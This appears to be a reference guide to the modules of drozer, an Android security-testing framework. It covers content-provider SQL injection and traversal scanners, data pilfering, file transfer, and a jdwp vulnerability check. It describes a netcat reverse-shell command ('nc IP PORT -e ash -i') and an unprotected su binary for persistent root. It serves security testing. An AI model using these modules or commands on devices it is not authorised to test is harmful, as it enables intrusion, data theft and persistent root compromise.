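Contents
Module list
Module | Purpose |
---|---|
auxiliary.webcontentresolver | Start a web service to access content providers |
exploit.jdwp.check | Check for the @jdwp-control vulnerability |
exploit.pilfer.general.apnprovider | Retrieve APN information |
exploit.pilfer.general.settingsprovider | View system settings |
information.datetime | View the device time |
information.deviceinfo | Get detailed device information |
information.permissions | List the permission information used by all applications on the phone |
scanner.activity.browsable | Find activities that can be viewed from the browser |
scanner.misc.native | List packages that contain native code |
scanner.misc.readablefiles | Find files that can be read by other applications |
scanner.misc.secretcodes | Find the phone's secret codes |
scanner.misc.writablefiles | Find files that other applications have permission to write to |
scanner.provider.finduris | Find content provider URIs |
scanner.provider.injection | Find SQL injection in content providers |
scanner.provider.sqltables | Find table names through SQL injection |
scanner.provider.traversal | Find directory traversal vulnerabilities |
shell.exec | Execute a single shell command |
shell.send | Send an ASH shell to a remote listener |
shell.start | Enter shell mode |
tools.file.download | Download a file from the phone |
tools.file.md5sum | Get the MD5 of a file |
tools.file.size | Get the file size |
tools.file.upload | Upload a file from the PC to the device |
tools.setup.busybox | Install Busybox |
tools.setup.minimalsu | Install minimal-su |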
auxiliary.webcontentresolver
usage: run auxiliary.webcontentresolver [-h] [-p PORT]
Starts a web service that connects to the content providers on the phone; it can also be used together with sqlmap.
Examples:
dz> run auxiliary.webcontentresolver --port 8080
WebContentResolver started on port 8080.
Ctrl+C to Stop
Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)
optional arguments:
Argument | Description |
---|---|
-p PORT, --port PORT | Set the web port |
exploit.jdwp.check
usage: run exploit.jdwp.check [-h]
This module targets a vulnerability: on Android 2.3, every debuggable app looks for a UNIX socket named @jdwp-control.
Examples:
dz> run exploit.jdwp.check
[+] Opened @jdwp-control
[*] Accepting connections
[+] com.mwr.dz connected!
[+] Received PID = 4931
[+] This device is vulnerable!
[+] com.mwr.dz connected!
[+] Received PID = 4940
[+] This device is vulnerable!
Last Modified: 2014-07-29
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
exploit.pilfer.general.apnprovider
usage: run exploit.pilfer.general.apnprovider [-h]
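Retrieves APN information. APN stands for Access Point Name, a parameter that must be configured in order to go online from the phone; it determines which access method the phone uses to reach the network.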
The target provider is content://telephony/carriers/preferapn
Examples:
dz> run exploit.pilfer.general.apnprovider
_id 1
name T-Mobile US
numeric 310260
mcc 310
mnc 260
apn epc.tmobile.com
… …
Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
exploit.pilfer.general.settingsprovider
usage: run exploit.pilfer.general.settingsprovider [-h]
Views the system settings.
Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
information.datetime
usage: run information.datetime [-h]
Views the time on the Android device.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
information.deviceinfo
usage: run information.deviceinfo [-h]
Gets detailed device information.
Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
information.permissions
usage: run information.permissions [-h] [--permission PERMISSION] [--protectionlevel PROTECTIONLEVEL]
Lists the permission information used by all applications on the phone.
Examples:
dz> run information.permissions --permission android.permission.INSTALL_PACKAGES
Allows the app to install new or updated Android packages. Malicious apps may use this to add new apps with arbitrarily
powerful permissions.
18 - signature|system
Last Modified: 2014-06-17
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
Argument | Description |
---|---|
--permission PERMISSION | Specify the permission |
--protectionlevel PROTECTIONLEVEL | Specify the protection level |
scanner.activity.browsable
usage: run scanner.activity.browsable [-a] [--package PACKAGE] [-f] [--filter FILTER]
Finds all browsable activities.
Package: com.android.contacts
Invocable URIs:
tel://
Classes:
.activities.PeopleActivity
com.android.contacts.NonPhoneActivity
Package: com.android.calendar
Invocable URIs:
http://www.google.com/calendar/event (PATTERN_PREFIX)
Classes:
GoogleCalendarUriIntentFilter
Package: com.android.browser
Invocable URIs:
http://
Classes:
BrowserActivity
Package: com.android.music
Invocable URIs:
http://
content://
Classes:
AudioPreview
Package: com.android.mms
Invocable URIs:
sms://
mms://
Classes:
.ui.ComposeMessageActivity
Last Modified: 2014-10-31
Credit: Tyrone (@mwrlabs)
License: BSD (3-clause)
optional arguments:
Argument | Description |
---|---|
-a PACKAGE, --package PACKAGE | Specify the package name |
-f FILTER, --filter FILTER | Specify a keyword |
scanner.misc.native
usage: run scanner.misc.native [-h] [-a PACKAGE] [-f FILTER] [-v]
Lists packages that contain native code.
Note: this is determined only by checking the lib files bundled with the package.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
Argument | Description |
---|---|
-a PACKAGE, --package PACKAGE | Specify the package name |
-f FILTER, --filter FILTER | Specify a keyword |
-v, --verbose | Show packages that do not contain native code |
scanner.misc.readablefiles
usage: run scanner.misc.readablefiles [-h] [-p] target
Finds files that can be read by other applications.
Examples:
dz> run scanner.misc.readablefiles /data -p
Discovered world-readable files in /data:
/data/system/packages-stopped.xml
/data/system/packages.list
/data/system/packages.xml
/data/system/uiderrors.txt
……
Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target the target directory to search
optional arguments:
Argument | Description |
---|---|
-p, --privileged | With root privileges |
scanner.misc.secretcodes
usage: run scanner.misc.secretcodes [-h] [-v]
Finds the phone's secret codes; for details see:
http://blog.csdn.net/huangjuecheng/article/details/7261211?spm=5176.100239.blogcont61513.10.a86Q5r
Last Modified: 2012-11-06
Credit: Mike (@mwrlabs)
License: BSD (3 clause)
optional arguments:
Argument | Description |
---|---|
-v, --verbose | Show detailed information |
scanner.misc.writablefiles
usage: run scanner.misc.writablefiles [-h] [-p] target
Finds files that other applications have permission to write to.
Examples:
dz> run scanner.misc.writablefiles /data --privileged
Discovered world-writable files in /data:
/data/anr/slow00.txt
/data/anr/slow01.txt
……
Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target the target directory to search
optional arguments:
Argument | Description |
---|---|
-v, --verbose | Show detailed information |
scanner.provider.finduris
usage: run scanner.provider.finduris [-h] [-a PACKAGE]
Finds content provider URIs.
Examples:
run scanner.provider.finduris
Last Modified: 2012-11-06
Credit: Luander ([email protected])
License: BSD (3 clause)
optional arguments:
Argument | Description |
---|---|
-a PACKAGE, --package PACKAGE | Specify the package name |
scanner.provider.injection
usage: run scanner.provider.injection [-h] [-a ]
Finds SQL injection.
Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)
optional arguments:
Argument | Description |
---|---|
-a , --package , --uri | Specify the package name or URI |
scanner.provider.sqltables
usage: run scanner.provider.sqltables [-h] [-a ]
Enumerate SQL tables accessible through SQL (projection) Injection vulnerabilities.
Last Modified: 2013-01-23
Credit: Rijnard
License: BSD (3 clause)
optional arguments:
Argument | Description |
---|---|
-a , --package , --uri | Specify the package name or URI |
scanner.provider.traversal
usage: run scanner.provider.traversal [-h] [-a ]
Finds directory traversal vulnerabilities.
Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)
optional arguments:
Argument | Description |
---|---|
-a , --package , --uri | Specify the package name or URI |
shell.exec
usage: run shell.exec [-h] command
Executes a single shell command.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
command the Linux command to execute
optional arguments:
-h, --help
shell.send
usage: run shell.send [-h] ip port
Sends an ASH shell to a remote listener.
This module executes nc IP PORT -e ash -i, using BusyBox. This will send an ASH shell to a netcat listener.
Last Modified: 2013-07-25
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
positional arguments:
ip ip address of the remote listener
port port address of the remote listener
optional arguments:
-h, --help
shell.start
usage: run shell.start [-h]
Enters shell mode.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
tools.file.download
usage: run tools.file.download [-h] source destination
Downloads a file from the phone to the PC.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
source
destination
optional arguments:
-h, --help
tools.file.md5sum
usage: run tools.file.md5sum [-h] target
md5 Checksum of File
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target
optional arguments:
-h, --help
tools.file.size
usage: run tools.file.size [-h] target
Gets the file size.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target
optional arguments:
-h, --help
tools.file.upload
usage: run tools.file.upload [-h] source destination
Uploads a file from the PC to the device.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
source
destination
optional arguments:
-h, --help
tools.setup.busybox
usage: run tools.setup.busybox [-h]
Installs Busybox.
Busybox provides a number of *nix utilities that are missing from Android. Some modules require Busybox to be installed.
Typically, you require root access to the device to install Busybox. drozer can install it from its restrictive context. You can
then use ‘busybox’ when executing shell commands from drozer.
Last Modified: 2012-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help
tools.setup.minimalsu
usage: run tools.setup.minimalsu [-h]
Prepares ‘minimal-su’ binary installation files on the device in order to provide access to a root shell on demand.
Installs minimal-su so that temporary root privileges can be obtained.
This binary provides drozer the ability to maintain access to a root shell on the device after obtaining a temporary root shell
via the use of an exploit. Just type su from a shell to get a root shell.
WARNING: This minimal version of the su binary is completely unprotected, meaning that any application on the device can obtain a
root shell without any user prompting.
Examples:
dz> run tools.setup.minimalsu
[*] Uploaded minimal-su
[*] Uploaded install-minimal-su.sh
[*] chmod 770 /data/data/com.mwr.dz/install-minimal-su.sh
[*] Ready! Execute /data/data/com.mwr.dz/install-minimal-su.sh from root context to install su
…insert root exploit here…
u0_a95@android:/data/data/com.mwr.dz # /data/data/com.mwr.dz/install-minimal-su.sh
Done. You can now use su from a shell.
u0_a95@android:/data/data/com.mwr.dz # exit
u0_a95@android:/data/data/com.mwr.dz $ su
u0_a95@android:/data/data/com.mwr.dz #
Last Modified: 2013-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, --help